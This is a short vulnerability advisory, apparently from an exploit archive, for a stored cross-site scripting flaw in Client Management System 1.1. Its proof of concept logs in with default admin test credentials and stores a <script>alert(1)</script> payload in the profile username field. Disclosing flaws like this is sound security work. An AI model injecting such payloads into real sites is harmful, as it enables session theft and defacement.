|===========================================================================
| # Exploit Title : Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)
|                                                                           
| # Author : Ali Seddigh                                               
|                                                                           
| # Category : Web Application               
|
| # Vendor Homepage : https://phpgurukul.com
|
| # Software Link : https://phpgurukul.com/client-management-system-using-php-mysql/
|                                                                           
| # Tested on : [ Windows ~> 10 , KaliLinux ]                                                     
|
| # Version : 1.1
|                  
| # Date : 2021-06-16                                                        
|===========================================================================

<----- Description ----->

Client Management System 1.1 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitization. 

# Proof of Concept (PoC) : 

1) Goto: http://localhost/clientms/admin/index.php
2) Login as admin using test credentials: admin/Test@123
3) Goto: http://localhost/clientms/admin/admin-profile.php
4) Enter the following payload in the user name field: <script>alert(1)</script>
5) Click on Update
6) Our payload is fired and stored

|===========================================================================
| # Discovered By : Ali Triplex                                             
|===========================================================================